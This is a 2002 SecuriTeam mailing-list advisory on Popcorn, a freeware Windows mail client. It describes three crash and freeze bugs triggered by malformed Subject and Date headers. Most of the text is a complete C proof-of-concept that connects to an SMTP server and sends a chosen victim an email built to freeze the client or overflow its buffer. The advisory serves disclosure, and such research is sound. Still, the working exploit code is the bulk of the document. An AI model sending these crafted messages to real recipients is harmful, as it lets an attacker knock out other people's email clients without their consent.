[NT] Popcorn Security Vulnerabilities

From: support@securiteam.com
Date: 07/12/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 12 Jul 2002 20:29:32 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Popcorn Security Vulnerabilities
------------------------------------------------------------------------

SUMMARY

 <http://www.ultrafunk.com/products/popcorn/> Popcorn is a freeware
ultra-lightweight POP3/SMTP e-mail client. The product allows remote
attackers to cause a denial of service attack against the client.

DETAILS

Vulnerable systems:
 * Popcorn version 1.20 and prior

Process freeze and resources consumption
If an attacker sends a mail with the following subject:

Subject: \t\t

The client will try reading the mail but it will fail to understand this
subject causing it to become stuck on the email downloading process,
termination of this process is not possible.

Buffer overflow in subject field
The client can be crashed whenever the user reads an email with a subject
like this:

Subject: (at least 490 'A's)

Bad management of the Date field in the mails received
This is an example of how Popcorn reformats a Date field:

Date: 1 = 01.01.2000 00:00
Date: 11 = 11.01.2000 00:00
Date: 111 = 20.04.2000 00:00
Date: 1111 = 15.01.2003 00:00
Date: 11111 = 02.06.2030 00:00
Date: 111111 = 02.01.2032 11:03
Date: 1111111 = Crash!

Therefore, an attacker can crash the Popcorn client sending it an email
with in the Date field a year greater than 2037 or as written before, with
1111111.

Exploit:
sock_err.h
void sock_err(int err) {
  char *error;

  if(err < 0) {
    switch(WSAGetLastError()) {
    case 10004: error = "Interrupted system call"; break;
    case 10009: error = "Bad file number"; break;
    case 10013: error = "Permission denied"; break;
    case 10014: error = "Bad address"; break;
    case 10022: error = "Invalid argument (not bind)"; break;
    case 10024: error = "Too many open files"; break;
    case 10035: error = "Operation would block"; break;
    case 10036: error = "Operation now in progress"; break;
    case 10037: error = "Operation already in progress"; break;
    case 10038: error = "Socket operation on non-socket"; break;
    case 10039: error = "Destination address required"; break;
    case 10040: error = "Message too long"; break;
    case 10041: error = "Protocol wrong type for socket"; break;
    case 10042: error = "Bad protocol option"; break;
    case 10043: error = "Protocol not supported"; break;
    case 10044: error = "Socket type not supported"; break;
    case 10045: error = "Operation not supported on socket"; break;
    case 10046: error = "Protocol family not supported"; break;
    case 10047: error = "Address family not supported by protocol family";
break;
    case 10048: error = "Address already in use"; break;
    case 10049: error = "Can't assign requested address"; break;
    case 10050: error = "Network is down"; break;
    case 10051: error = "Network is unreachable"; break;
    case 10052: error = "Net dropped connection or reset"; break;
    case 10053: error = "Software caused connection abort"; break;
    case 10054: error = "Connection reset by peer"; break;
    case 10055: error = "No buffer space available"; break;
    case 10056: error = "Socket is already connected"; break;
    case 10057: error = "Socket is not connected"; break;
    case 10058: error = "Can't send after socket shutdown"; break;
    case 10059: error = "Too many references, can't splice"; break;
    case 10060: error = "Connection timed out"; break;
    case 10061: error = "Connection refused"; break;
    case 10062: error = "Too many levels of symbolic links"; break;
    case 10063: error = "File name too long"; break;
    case 10064: error = "Host is down"; break;
    case 10065: error = "No Route to Host"; break;
    case 10066: error = "Directory not empty"; break;
    case 10067: error = "Too many processes"; break;
    case 10068: error = "Too many users"; break;
    case 10069: error = "Disc Quota Exceeded"; break;
    case 10070: error = "Stale NFS file handle"; break;
    case 10091: error = "Network SubSystem is unavailable"; break;
    case 10092: error = "WINSOCK DLL Version out of range"; break;
    case 10093: error = "Successful WSASTARTUP not yet performed"; break;
    case 10071: error = "Too many levels of remote in path"; break;
    case 11001: error = "Host not found"; break;
    case 11002: error = "Non-Authoritative Host not found"; break;
    case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED,
NOTIMP"; break;
    case 11004: error = "Valid name, no data record of requested type";
break;
    default: error = "Unknown error"; break;
    }
    printf("\nError: %s\n", error);
    exit(1);
  }
}

popcorn.c
/*
Popcorn mail client crasher proof-of-concept
(all version, because no more supported)
  by Auriemma Luigi (e-mail: bugtest@sitoverde.com)

Windows version

With this little proof-of-concept an attacker can exploits some bugs
of the Popcorn client.
The arguments to pass to the utility are the From field, the To,
what SMTP server want use and the number of the attack.

Linux version: run the exe with Wine (http://www.winehq.com)

*/

#include <stdio.h>
#include <winsock.h>
#include <string.h>
#include "sock_err.h"

#define MSG1 "Subject: \t\t"
#define MSG2 "Subject: Hello, how are you? I'm going to crash you..."
  /* I have inserted a long string so the user can't see 'A's... after it
*/
#define MSG3 "Date: 1111111"
  /* or for example, "Date: Tue, 01 Jul 2099 01:31:30 +0200" */
#define MSG2CHZ 'A'
#define BUFFSIZE 506
  /* 490 for exploit 2 + "Subject: " + CLOSEDATA = 506 */
#define TMPSIZE 192
  /* for the received answers and for the SMTP commands */
#define OK1 "220" /* HELO */
#define OK2 "250" /* OK */
#define OK3 "354" /* DATA */
#define OK4 "221" /* QUIT */
#define HELO "HELO x\r\n"
#define DATA "DATA\r\n"
#define CLOSEDATA "\r\n\r\n.\r\n"
#define QUIT "QUIT\r\n"

void smtp_send(unsigned char *buff, unsigned char *ok);

unsigned char tmpbuff[TMPSIZE];
int shandle,
  err;

int main(int argc, char *argv[]) {
  setbuf(stdout, NULL);
  printf("\nPopcorn mail client crasher\n");
  if(argc < 5) {
    printf("\nUsage: %s <from@> <to@> <SMTP_server> <attack>\n\n"
           "Attack:\n"
           "1 - Process freezed = Subject: \\t\\t\n"
           "2 - Buffer overflow = Subject: 490(A)\n"
           "3 - Date crash = Date: 1111111\n",
           argv[0]);
    exit(1);
  }

  WSADATA wsadata;
  struct sockaddr_in peer;
  struct hostent *hp;
  unsigned char buff[BUFFSIZE];

  memset(buff, 0x00, BUFFSIZE);
  memset(tmpbuff, 0x00, TMPSIZE);

  switch(atoi(argv[4])) {
    case 1: sprintf(buff, "%s%s", MSG1, CLOSEDATA); break;
    case 2: {
      memset(buff, MSG2CHZ, BUFFSIZE - strlen(CLOSEDATA));
      memcpy(buff, MSG2, strlen(MSG2));
      strcat(buff, CLOSEDATA);
    }; break;
    case 3: sprintf(buff, "%s%s", MSG3, CLOSEDATA); break;
    default: {
      printf("\nError: Wrong type of attack\n");
      exit(1);
    }
  }

  WSAStartup(MAKEWORD(2,0), &wsadata);
  if(inet_addr(argv[3]) == INADDR_NONE) {
                hp = gethostbyname(argv[3]);
    if(hp == 0) sock_err(-1);
                else peer.sin_addr = *((struct in_addr *)hp->h_addr);
        }
                else peer.sin_addr.s_addr = inet_addr(argv[3]);
  peer.sin_port = htons(IPPORT_SMTP);
  peer.sin_family = AF_INET;

  shandle = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  sock_err(shandle);
  err = connect(shandle, (struct sockaddr *)&peer, sizeof(peer));
  sock_err(err);

  smtp_send("", OK1);
  smtp_send(HELO, OK2);
  sprintf(tmpbuff, "MAIL FROM: <%s>\r\n", argv[1]);
  smtp_send(tmpbuff, OK2);
  sprintf(tmpbuff, "RCPT TO: <%s>\r\n", argv[2]);
  smtp_send(tmpbuff, OK2);
  smtp_send(DATA, OK3);
  smtp_send(buff, OK2);
  smtp_send(QUIT, OK4);

  printf("Mail sended successfully!\n");
  return(0);
}

void smtp_send(unsigned char *buff, unsigned char *ok) {
  err = send(shandle, buff, strlen(buff), 0);
  sock_err(err);
  err = recv(shandle, tmpbuff, TMPSIZE, 0);
  sock_err(err);
  if(!strstr(tmpbuff, ok)) {
    printf("\nError: %s\n", tmpbuff);
    exit(1);
  }
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:bugtest@sitoverde.com>
Auriemma Luigi.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages